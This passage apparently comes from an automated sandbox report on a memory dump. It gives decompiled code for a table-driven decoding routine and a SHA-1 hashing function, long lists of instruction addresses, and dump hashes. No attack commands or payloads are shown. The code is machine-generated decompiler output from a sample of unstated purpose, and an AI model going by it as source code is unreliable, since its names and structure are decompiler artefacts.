															 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t573 >> 3);
															_t461 =  *(_t691 + 0x18);
															 *(_t654 + 8) = _t573 & 0x00000007;
															_t575 = 0x10;
															_t578 =  *((intOrPtr*)(_t654 + 0x1e4c + _t461 * 4)) + (_t647 -  *((intOrPtr*)(_t654 + 0x1e08 + _t461 * 4)) >> _t575 - _t461);
															__eflags = _t578 -  *((intOrPtr*)(_t654 + 0x1e08));
															asm("sbb eax, eax");
															_t462 = _t461 & _t578;
															__eflags = _t462;
															_t463 =  *(_t654 + 0x2a90 + _t462 * 2) & 0x0000ffff;
															goto L67;
														}
														_t580 = _t654 + (_t458 + 0x783) * 4;
														while(1) {
															__eflags = _t647 -  *_t580;
															if(_t647 <  *_t580) {
																break;
															}
															_t458 = _t458 + 1;
															_t580 = _t580 + 4;
															__eflags = _t458 - 0xf;
															if(_t458 < 0xf) {
																continue;
															}
															goto L66;
														}
														 *(_t691 + 0x18) = _t458;
														goto L66;
													} else {
														_t581 = 0x10;
														_t650 = _t647 >> _t581 - _t457;
														_t584 = ( *(_t650 + _t654 + 0x1e90) & 0x000000ff) +  *(_t654 + 8);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t584 >> 3);
														 *(_t654 + 8) = _t584 & 0x00000007;
														_t463 =  *(_t654 + 0x2290 + _t650 * 2) & 0x0000ffff;
														L67:
														_t683 = _t683 + (_t463 & 0x0000ffff);
														goto L69;
													}
												}
											}
										}
										 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) = _t619;
										_t69 = _t663 + 0x7c;
										 *_t69 =  *(_t663 + 0x7c) + 1;
										__eflags =  *_t69;
										goto L33;
									}
									_t607 = _t654 + (_t353 + 0xd) * 4;
									while(1) {
										__eflags = _t616 -  *_t607;
										if(_t616 <  *_t607) {
											break;
										}
										_t353 = _t353 + 1;
										_t607 = _t607 + 4;
										__eflags = _t353 - 0xf;
										if(_t353 < 0xf) {
											continue;
										}
										goto L30;
									}
									_t490 = _t353;
									goto L30;
								}
								_t608 = 0x10;
								_t653 = _t616 >> _t608 - _t352;
								_t611 = ( *(_t653 + _t654 + 0xb8) & 0x000000ff) +  *(_t667 + 4);
								 *_t667 =  *_t667 + (_t611 >> 3);
								_t347 = _t654 + 4;
								 *(_t347 + 4) = _t611 & 0x00000007;
								_t619 =  *(_t654 + 0x4b8 + _t653 * 2) & 0x0000ffff;
								goto L31;
							}
							__eflags = _t507 -  *(_t663 + 0x7c);
							if(_t507 ==  *(_t663 + 0x7c)) {
								goto L21;
							}
							E002047DA(_t663);
							__eflags =  *((intOrPtr*)(_t663 + 0x4c5c)) -  *((intOrPtr*)(_t663 + 0x4c4c));
							if(__eflags > 0) {
								L152:
								_t418 = 0;
								goto L101;
							}
							if(__eflags < 0) {
								goto L21;
							}
							__eflags =  *((intOrPtr*)(_t663 + 0x4c58)) -  *((intOrPtr*)(_t663 + 0x4c48));
							if( *((intOrPtr*)(_t663 + 0x4c58)) >  *((intOrPtr*)(_t663 + 0x4c48))) {
								goto L152;
							}
							goto L21;
						}
					}
				}
				 *((char*)(_t654 + 0x2c)) = 1;
				_push(_t654 + 0x30);
				_push(_t654 + 0x18);
				_push(_t654 + 4);
				if(E0020397F(__ecx) != 0) {
					goto L3;
				}
				goto L2;
			}


















































































































































          0x00206ce0
          0x00206ce4
          0x00206cea
          0x00206d13
          0x00206d16
          0x00206d1b
          0x00206d1e
          0x00206d05
          0x00206d05
          0x00000000
          0x00206d20
          0x00206d2b
          0x00206d2e
          0x00206d31
          0x00206d35
          0x00206d39
          0x00206d3d
          0x00206d3f
          0x00206d41
          0x00206d41
          0x00206d45
          0x00206d52
          0x00206d52
          0x00206d58
          0x00206d5b
          0x00206d5d
          0x00206d61
          0x00000000
          0x00000000
          0x00206d63
          0x00206d63
          0x00206d65
          0x002072f0
          0x002072f0
          0x002072f2
          0x00000000
          0x002072f3
          0x00206d6b
          0x00206d79
          0x00206d79
          0x00206d7b
          0x00206d8a
          0x00206d8a
          0x00206d90
          0x0020763f
          0x0020763f
          0x00000000
          0x0020763f
          0x00000000
          0x00206d90
          0x00206d7d
          0x00206d84
          0x00000000
          0x00000000
          0x00000000
          0x00206d84
          0x00206d70
          0x00206d73
          0x00000000
          0x00000000
          0x00000000
          0x00206d96
          0x00206d96
          0x00206da3
          0x00206da8
          0x00206ddc
          0x00206ddc
          0x00206de1
          0x00206de8
          0x00206dee
          0x00206df4
          0x00206df8
          0x00206e32
          0x00206e33
          0x00206e34
          0x00206e36
          0x00206e4f
          0x00206e52
          0x00206e59
          0x00206e5c
          0x00206e5f
          0x00206e68
          0x00206e71
          0x00206e73
          0x00206e76
          0x00206e78
          0x00206e78
          0x00206e7a
          0x00206e82
          0x00206e85
          0x00206e8a
          0x00206e8c
          0x00206ea5
          0x00206eab
          0x002072c7
          0x002072c9
          0x002072fc
          0x00207302
          0x0020741e
          0x0020741e
          0x00207427
          0x0020742a
          0x0020742c
          0x00207430
          0x0020743f
          0x0020743f
          0x00207442
          0x00207447
          0x0020744e
          0x00207454
          0x0020745a
          0x00207461
          0x0020748f
          0x00207490
          0x00207491
          0x00207493
          0x002074af
          0x002074b2
          0x002074b9
          0x002074bc
          0x002074bf
          0x002074cb
          0x002074d7
          0x002074d9
          0x002074df
          0x002074e1
          0x002074e1
          0x002074e3
          0x002074eb
          0x002074eb
          0x002074ee
          0x002074f1
          0x00207502
          0x00207505
          0x00207505
          0x002074f3
          0x002074f3
          0x002074f3
          0x00207507
          0x0020750a
          0x0020750c
          0x00207511
          0x00207518
          0x00207520
          0x00207522
          0x00207529
          0x0020752c
          0x0020752c
          0x0020752f
          0x0020752f
          0x00207532
          0x0020753d
          0x00207541
          0x00207546
          0x00207549
          0x0020754b
          0x002075ff
          0x002075ff
          0x00207602
          0x00207604
          0x00000000
          0x00000000
          0x0020760a
          0x00207610
          0x00207616
          0x0020761b
          0x0020761f
          0x00207625
          0x0020762e
          0x00207631
          0x00207631
          0x00207631
          0x00207636
          0x00207636
          0x00206e9d
          0x00206e9d
          0x00000000
          0x00207551
          0x00207551
          0x00207553
          0x00000000
          0x00000000
          0x00207559
          0x0020755f
          0x00207561
          0x00207567
          0x0020756b
          0x0020756e
          0x00207572
          0x002075c4
          0x002075c7
          0x002071fb
          0x002071fb
          0x002071fe
          0x00207200
          0x00206d4a
          0x00206d4e
          0x00206d4e
          0x00206d52
          0x00206d52
          0x00206d58
          0x00206d5b
          0x00206d5d
          0x00206d61
          0x00000000
          0x00000000
          0x00000000
          0x00206d61
          0x00206d52
          0x00207209
          0x0020720b
          0x0020720e
          0x00207211
          0x00000000
          0x00000000
          0x0020721a
          0x0020721d
          0x00207220
          0x00207223
          0x00000000
          0x00000000
          0x0020722c
          0x0020722f
          0x00207232
          0x00207235
          0x00000000
          0x00000000
          0x0020723e
          0x00207241
          0x00207244
          0x00207247
          0x00000000
          0x00000000
          0x00207250
          0x00207253
          0x00207256
          0x00207259
          0x00000000
          0x00000000
          0x00207262
          0x00207265
          0x00207269
          0x0020726c
          0x0020726f
          0x00207278
          0x0020727b
          0x0020727b
          0x00000000
          0x0020726f
          0x002075cf
          0x002075cf
          0x002075d2
          0x002075d6
          0x002075d8
          0x002075dc
          0x002075e1
          0x002075e5
          0x002075e8
          0x002075eb
          0x002075ee
          0x002075f1
          0x002075f5
          0x002075f5
          0x002075f5
          0x002071f7
          0x002071f7
          0x00000000
          0x002071f7
          0x00207574
          0x00207577
          0x00000000
          0x00000000
          0x0020757f
          0x0020757f
          0x00207582
          0x00207585
          0x00207588
          0x0020758d
          0x00207593
          0x00207599
          0x0020759f
          0x002075a5
          0x002075ab
          0x002075ae
          0x002075b1
          0x002075b4
          0x002075b7
          0x002075ba
          0x002075ba
          0x002075ba
          0x00000000
          0x002075bf
          0x0020754b
          0x0020749b
          0x0020749e
          0x0020749e
          0x002074a0
          0x00000000
          0x00000000
          0x002074a2
          0x002074a3
          0x002074a6
          0x002074a9
          0x00000000
          0x00000000
          0x00000000
          0x002074ab
          0x002074ad
          0x00000000
          0x002074ad
          0x00207465
          0x00207468
          0x00207472
          0x0020747a
          0x00207480
          0x00207483
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00207432
          0x00207432
          0x00207435
          0x00207437
          0x0020743a
          0x0020743a
          0x0020743a
          0x00000000
          0x00207432
          0x00207308
          0x0020730b
          0x0020730f
          0x00207311
          0x00206e27
          0x00206e27
          0x00000000
          0x00206e27
          0x00207317
          0x0020731a
          0x0020731f
          0x00207321
          0x0020732b
          0x00207330
          0x00207332
          0x002073e2
          0x002073e2
          0x002073e5
          0x002073e7
          0x00000000
          0x00000000
          0x002073ed
          0x002073f3
          0x002073f9
          0x002073fe
          0x00207402
          0x00207408
          0x00207411
          0x00207414
          0x00207414
          0x00207414
          0x00000000
          0x00207419
          0x00207338
          0x0020733a
          0x00000000
          0x00000000
          0x00207340
          0x00207346
          0x00207348
          0x0020734e
          0x00207352
          0x00207355
          0x00207359
          0x002073ab
          0x002073ae
          0x00000000
          0x00000000
          0x002073b6
          0x002073b6
          0x002073b9
          0x002073bb
          0x002073bf
          0x002073c4
          0x002073c8
          0x002073cb
          0x002073ce
          0x002073d1
          0x002073d4
          0x002073d8
          0x002073d8
          0x002073d8
          0x00000000
          0x002073dd
          0x0020735b
          0x0020735e
          0x00000000
          0x00000000
          0x00207366
          0x00207366
          0x00207369
          0x0020736c
          0x0020736f
          0x00207374
          0x0020737a
          0x00207380
          0x00207386
          0x0020738c
          0x00207392
          0x00207395
          0x00207398
          0x0020739b
          0x0020739e
          0x002073a1
          0x002073a1
          0x002073a1
          0x00000000
          0x002073a6
          0x002072cf
          0x002072d3
          0x002072d8
          0x002072da
          0x00000000
          0x00000000
          0x002072e3
          0x002072e8
          0x002072ea
          0x00000000
          0x00000000
          0x00000000
          0x002072ea
          0x00206eb1
          0x00206eb7
          0x00206eba
          0x00206ecb
          0x00206ece
          0x00206ece
          0x00206ebc
          0x00206ebc
          0x00206ebc
          0x00206ed0
          0x00206ed3
          0x00206ed5
          0x00206eff
          0x00206ed7
          0x00206ed9
          0x00206ee0
          0x00206ee8
          0x00206eea
          0x00206eec
          0x00206ef4
          0x00206efa
          0x00206efa
          0x00206f04
          0x00206f0b
          0x00206f11
          0x00206f17
          0x00206f1e
          0x00206f4c
          0x00206f4d
          0x00206f4e
          0x00206f50
          0x00206f6c
          0x00206f6f
          0x00206f76
          0x00206f79
          0x00206f7c
          0x00206f88
          0x00206f94
          0x00206f96
          0x00206f9c
          0x00206f9e
          0x00206f9e
          0x00206fa0
          0x00000000
          0x00206fa0
          0x00206f58
          0x00206f5b
          0x00206f5b
          0x00206f5d
          0x00000000
          0x00000000
          0x00206f5f
          0x00206f60
          0x00206f63
          0x00206f66
          0x00000000
          0x00000000
          0x00000000
          0x00206f68
          0x00206f6a
          0x00000000
          0x00206f20
          0x00206f22
          0x00206f25
          0x00206f2f
          0x00206f37
          0x00206f3d
          0x00206f40
          0x00206fa8
          0x00206fa8
          0x00206fab
          0x00206fae
          0x00206fbe
          0x00206fc1
          0x00206fc1
          0x00206fb0
          0x00206fb0
          0x00206fb0
          0x00206fc3
          0x00206fc7
          0x00206fca
          0x00206fce
          0x00206fd0
          0x00206fd4
          0x00206fd6
          0x00207107
          0x00207107
          0x0020710d
          0x0020710f
          0x00207110
          0x00207116
          0x00207118
          0x00207119
          0x0020711f
          0x00207121
          0x00207121
          0x00207121
          0x0020711f
          0x00207116
          0x00207125
          0x0020712b
          0x00207131
          0x00207134
          0x00207137
          0x00207142
          0x00207144
          0x00207149
          0x0020714c
          0x00207150
          0x00207152
          0x00207283
          0x00207283
          0x00207287
          0x0020728a
          0x0020728c
          0x00000000
          0x00000000
          0x00207292
          0x00207298
          0x0020729c
          0x002072a2
          0x002072a7
          0x002072ab
          0x002072b1
          0x002072ba
          0x002072bd
          0x002072bd
          0x002072bd
          0x00000000
          0x00207158
          0x00207158
          0x0020715a
          0x00000000
          0x00000000
          0x00207160
          0x00207166
          0x00207169
          0x0020716f
          0x00207173
          0x00207176
          0x0020717a
          0x002071c5
          0x002071c8
          0x00000000
          0x00000000
          0x002071cc
          0x002071cc
          0x002071cf
          0x002071d3
          0x002071d5
          0x002071d9
          0x002071de
          0x002071e2
          0x002071e5
          0x002071e8
          0x002071eb
          0x002071ee
          0x002071f2
          0x002071f2
          0x002071f2
          0x00000000
          0x002071d5
          0x0020717c
          0x0020717f
          0x00000000
          0x00000000
          0x00207183
          0x00207183
          0x00207186
          0x00207189
          0x0020718c
          0x00207191
          0x00207197
          0x0020719d
          0x002071a3
          0x002071a9
          0x002071af
          0x002071b2
          0x002071b5
          0x002071b8
          0x002071bb
          0x002071be
          0x002071be
          0x002071be
          0x00000000
          0x002071c3
          0x00206fdc
          0x00206fdc
          0x00206fdf
          0x002070da
          0x002070e3
          0x002070ed
          0x002070f1
          0x002070fa
          0x002070fd
          0x002070fd
          0x00207100
          0x00207103
          0x00207103
          0x00000000
          0x00207103
          0x00206fe5
          0x0020701b
          0x00206fe7
          0x00206fea
          0x00206fef
          0x00206ff7
          0x00206fff
          0x00207002
          0x0020700a
          0x00207011
          0x00207016
          0x00207016
          0x00207020
          0x00207027
          0x0020702d
          0x00207033
          0x0020703a
          0x00207068
          0x00207069
          0x0020706a
          0x0020706e
          0x00207070
          0x0020708e
          0x00207091
          0x0020709d
          0x002070a0
          0x002070a4
          0x002070a9
          0x002070bc
          0x002070be
          0x002070c4
          0x002070c6
          0x002070c6
          0x002070c8
          0x00000000
          0x002070c8
          0x00207078
          0x0020707b
          0x0020707b
          0x0020707d
          0x00000000
          0x00000000
          0x0020707f
          0x00207080
          0x00207083
          0x00207086
          0x00000000
          0x00000000
          0x00000000
          0x00207088
          0x0020708a
          0x00000000
          0x0020703c
          0x0020703e
          0x00207041
          0x0020704b
          0x00207053
          0x00207059
          0x0020705c
          0x002070d0
          0x002070d3
          0x00000000
          0x002070d3
          0x0020703a
          0x00206fd6
          0x00206f1e
          0x00206e97
          0x00206e9a
          0x00206e9a
          0x00206e9a
          0x00000000
          0x00206e9a
          0x00206e3b
          0x00206e3e
          0x00206e3e
          0x00206e40
          0x00000000
          0x00000000
          0x00206e42
          0x00206e43
          0x00206e46
          0x00206e49
          0x00000000
          0x00000000
          0x00000000
          0x00206e4b
          0x00206e4d
          0x00000000
          0x00206e4d
          0x00206dfc
          0x00206dff
          0x00206e09
          0x00206e11
          0x00206e17
          0x00206e1a
          0x00206e1d
          0x00000000
          0x00206e1d
          0x00206daa
          0x00206dad
          0x00000000
          0x00000000
          0x00206db1
          0x00206dbc
          0x00206dc2
          0x0020764b
          0x0020764b
          0x00000000
          0x0020764b
          0x00206dc8
          0x00000000
          0x00000000
          0x00206dd0
          0x00206dd6
          0x00000000
          0x00000000
          0x00000000
          0x00206dd6
          0x00206d52
          0x00206d1e
          0x00206cef
          0x00206cf3
          0x00206cf7
          0x00206cfb
          0x00206d03
          0x00000000
          0x00000000
          0x00000000

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
          • Instruction ID: 472c88f860fbb361eaccd5837eef92afe896613b9d9de78917d9b6c85ee76f46
          • Opcode Fuzzy Hash: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
          • Instruction Fuzzy Hash: 4A62E3706287869FC719CF28C8906A9FBE1BF55304F14866DD99A8B782D331F975CB80
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FE973, Relevance: .7, Instructions: 694COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 70%
          			E001FE973(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _t429;
				intOrPtr _t431;
				intOrPtr _t436;
				void* _t441;
				intOrPtr _t443;
				signed int _t446;
				void* _t448;
				signed int _t454;
				signed int _t460;
				signed int _t466;
				signed int _t474;
				signed int _t482;
				signed int _t489;
				signed int _t512;
				signed int _t519;
				signed int _t526;
				signed int _t546;
				signed int _t555;
				signed int _t564;
				signed int* _t592;
				signed int _t593;
				signed int _t595;
				signed int _t596;
				signed int* _t597;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t604;
				signed int* _t605;
				signed int _t606;
				signed int* _t670;
				signed int* _t741;
				signed int _t752;
				signed int _t769;
				signed int _t773;
				signed int _t777;
				signed int _t781;
				signed int _t782;
				signed int _t786;
				signed int _t787;
				signed int _t791;
				signed int _t796;
				signed int _t800;
				signed int _t804;
				signed int _t806;
				signed int _t809;
				signed int _t810;
				signed int* _t811;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t820;
				signed int _t821;
				signed int _t825;
				signed int _t830;
				signed int _t834;
				signed int _t838;
				signed int* _t839;
				signed int _t841;
				signed int _t842;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int* _t848;
				signed int _t851;
				signed int* _t854;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t862;
				signed int _t863;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t880;
				signed int* _t881;
				signed int _t882;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int* _t898;
				signed int _t899;
				signed int _t901;
				signed int _t902;
				signed int _t904;
				signed int _t905;

				_t906 =  &_v28;
				if(_a16 == 0) {
					_t839 = _a8;
					_v20 = _t839;
					E0020EA80(_t839, _a12, 0x40);
					_t906 =  &(( &_v28)[3]);
				} else {
					_t839 = _a12;
					_v20 = _t839;
				}
				_t848 = _a4;
				_t593 =  *_t848;
				_t886 = _t848[1];
				_a12 = _t848[2];
				_a16 = _t848[3];
				_v24 = 0;
				_t429 = E00215604( *_t839);
				asm("rol edx, 0x5");
				 *_t839 = _t429;
				_t851 = _t848[4] + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t429;
				_t430 = _t839;
				asm("ror ebp, 0x2");
				_v16 = _t839;
				_a8 =  &(_t839[3]);
				do {
					_t431 = E00215604(_t430[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t431;
					asm("ror ebx, 0x2");
					_a16 = _a16 + 0x5a827999 + ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t431;
					_t436 = E00215604( *((intOrPtr*)(_a8 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 - 4)) = _t436;
					asm("ror esi, 0x2");
					_a12 = _a12 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _a16 + _t436;
					_t441 = E00215604( *_a8);
					asm("rol edx, 0x5");
					 *_a8 = _t441;
					asm("ror dword [esp+0x48], 0x2");
					_t886 = _t886 + ((_t851 ^ _t593) & _a16 ^ _t593) + _a12 + 0x5a827999 + _t441;
					_t443 = E00215604( *((intOrPtr*)(_a8 + 4)));
					_a8 = _a8 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 + 4)) = _t443;
					_t446 = _v24 + 5;
					asm("ror dword [esp+0x48], 0x2");
					_v24 = _t446;
					_t593 = _t593 + ((_t851 ^ _a16) & _a12 ^ _t851) + _t886 + _t443 + 0x5a827999;
					_v16 =  &(_t839[_t446]);
					_t448 = E00215604(_t839[_t446]);
					_t906 =  &(_t906[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t448;
					_t430 = _v16;
					asm("ror ebp, 0x2");
					_t851 = _t851 + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t448;
				} while (_v24 != 0xf);
				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				 *_t839 = _t769;
				_t454 = ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t769 + _a16 + 0x5a827999;
				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
				_a16 = _t454;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t839[1] = _t773;
				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _a12 + 0x5a827999;
				asm("ror esi, 0x2");
				_a8 = _t460;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[2] = _t777;
				_t466 = ((_t851 ^ _t593) & _a16 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
				_t887 = _a16;
				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
				_v28 = _t466;
				asm("ror ebp, 0x2");
				_a16 = _t887;
				_t888 = _a8;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[3] = _t781;
				asm("ror ebp, 0x2");
				_t782 = 0x11;
				_a12 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
				_a8 = _t888;
				_v16 = _t782;
				do {
					_t89 = _t782 + 5; // 0x16
					_t474 = _t89;
					_v8 = _t474;
					_t91 = _t782 - 5; // 0xc
					_t92 = _t782 + 3; // 0x14
					_t890 = _t92 & 0x0000000f;
					_t595 = _t474 & 0x0000000f;
					_v12 = _t890;
					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
					asm("rol edx, 1");
					_t839[_t890] = _t786;
					_t891 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t891;
					_t482 = _v16;
					_v24 = _t851 + (_a16 ^ _a8 ^ _t891) + 0x6ed9eba1 + _a12 + _t786;
					_t854 = _v20;
					_t787 = 0xf;
					_t841 = _t482 + 0x00000006 & _t787;
					_t893 = _t482 + 0x00000004 & _t787;
					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
					asm("rol edx, 1");
					 *(_t854 + _t893 * 4) = _t791;
					_t855 = _a12;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_a12 = _t855;
					_t489 = _v16;
					_a16 = _a16 + 0x6ed9eba1 + (_a8 ^ _v28 ^ _t855) + _v24 + _t791;
					_t857 = _t489 + 0x00000007 & 0x0000000f;
					_t670 = _v20;
					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
					asm("rol edx, 1");
					 *(_t670 + _t595 * 4) = _t796;
					_t596 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t596;
					_t597 = _v20;
					_a8 = _a8 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _a12) + _a16 + _t796;
					asm("rol ecx, 0x5");
					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t597 + _t841 * 4) = _t800;
					_t598 = _a16;
					_t839 = _v20;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _a12) + _a8 + _t800;
					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
					_t894 = _a8;
					asm("rol edx, 1");
					_t839[_t857] = _t804;
					_t851 = _v24;
					asm("rol ecx, 0x5");
					_t782 = _v8;
					asm("ror ebp, 0x2");
					_a8 = _t894;
					_a12 = _a12 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
					_v16 = _t782;
				} while (_t782 + 3 <= 0x23);
				_t858 = 0x25;
				_v16 = _t858;
				while(1) {
					_t199 = _t858 + 5; // 0x2a
					_t512 = _t199;
					_t200 = _t858 - 5; // 0x20
					_v4 = _t512;
					_t202 = _t858 + 3; // 0x28
					_t806 = _t202 & 0x0000000f;
					_v8 = _t806;
					_t896 = _t512 & 0x0000000f;
					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
					asm("rol esi, 1");
					_t599 = _v28;
					_t839[_t806] = _t862;
					asm("rol edx, 0x5");
					asm("ror ebx, 0x2");
					_t863 = 0xf;
					_v28 = _t599;
					_v24 = _a12 - 0x70e44324 + ((_a8 | _v28) & _t598 | _a8 & _t599) + _t862 + _v24;
					_t519 = _v16;
					_t601 = _t519 + 0x00000006 & _t863;
					_t809 = _t519 + 0x00000004 & _t863;
					_v12 = _t809;
					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
					asm("rol esi, 1");
					_t839[_t809] = _t867;
					_t842 = _a12;
					_t810 = _v24;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_a12 = _t842;
					_t243 = _t810 - 0x70e44324; // -1894007573
					_t811 = _v20;
					_a16 = _t243 + ((_v28 | _t842) & _a8 | _v28 & _t842) + _t867 + _a16;
					_t526 = _v16;
					_t844 = _t526 + 0x00000007 & 0x0000000f;
					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
					asm("rol esi, 1");
					 *(_t811 + _t896 * 4) = _t871;
					_t897 = _v24;
					asm("rol edx, 0x5");
					asm("ror ebp, 0x2");
					_t814 = _a16 + 0x8f1bbcdc + ((_t897 | _a12) & _v28 | _t897 & _a12) + _t871 + _a8;
					_v24 = _t897;
					_t898 = _v20;
					_a8 = _t814;
					asm("rol edx, 0x5");
					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t601 * 4) = _t875;
					_t598 = _a16;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_t815 = _t814 + ((_v24 | _t598) & _a12 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
					_v28 = _t815;
					asm("rol edx, 0x5");
					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t844 * 4) = _t879;
					_t899 = _a8;
					_t845 = _v24;
					asm("ror ebp, 0x2");
					_a8 = _t899;
					_t858 = _v4;
					_a12 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _a12;
					_v16 = _t858;
					if(_t858 + 3 > 0x37) {
						break;
					}
					_t839 = _v20;
				}
				_t816 = 0x39;
				_v16 = _t816;
				do {
					_t310 = _t816 + 5; // 0x3e
					_t546 = _t310;
					_v8 = _t546;
					_t312 = _t816 + 3; // 0x3c
					_t313 = _t816 - 5; // 0x34
					_t880 = 0xf;
					_t901 = _t312 & _t880;
					_t603 = _t546 & _t880;
					_t881 = _v20;
					_v4 = _t901;
					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t901 * 4) = _t820;
					_t902 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t902;
					_v24 = (_a16 ^ _a8 ^ _t902) + _t820 + _t845 + _a12 + 0xca62c1d6;
					_t555 = _v16;
					_t821 = 0xf;
					_t847 = _t555 + 0x00000006 & _t821;
					_t904 = _t555 + 0x00000004 & _t821;
					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t904 * 4) = _t825;
					_t882 = _a12;
					asm("rol ecx, 0x5");
					_a16 = (_a8 ^ _v28 ^ _t882) + _t825 + _a16 + _v24 + 0xca62c1d6;
					_t564 = _v16;
					asm("ror esi, 0x2");
					_a12 = _t882;
